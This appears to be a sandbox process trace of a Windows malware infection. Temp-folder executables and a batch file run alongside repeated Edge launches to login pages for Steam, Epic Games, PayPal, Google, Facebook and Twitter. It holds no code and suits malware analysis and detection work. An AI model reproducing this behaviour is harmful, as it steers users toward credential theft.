"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,18342986278826994582,3345467212881018459,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,18342986278826994582,3345467212881018459,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,144926622398744556,12556949913001646629,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,144926622398744556,12556949913001646629,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,10997434609157852635,4303289285213158550,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,10997434609157852635,4303289285213158550,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9312 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9312 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\6915.exe

C:\Users\Admin\AppData\Local\Temp\6915.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9788 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vT7qt1Km.exe

C:\Users\Admin\AppData\Local\Temp\6FBD.exe

C:\Users\Admin\AppData\Local\Temp\6FBD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\eG7XH4HQ.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\825C.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,15176385790214800802,2977233599442229605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x9c,0x108,0x7ffbb8a446f8,0x7ffbb8a44708,0x7ffbb8a44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

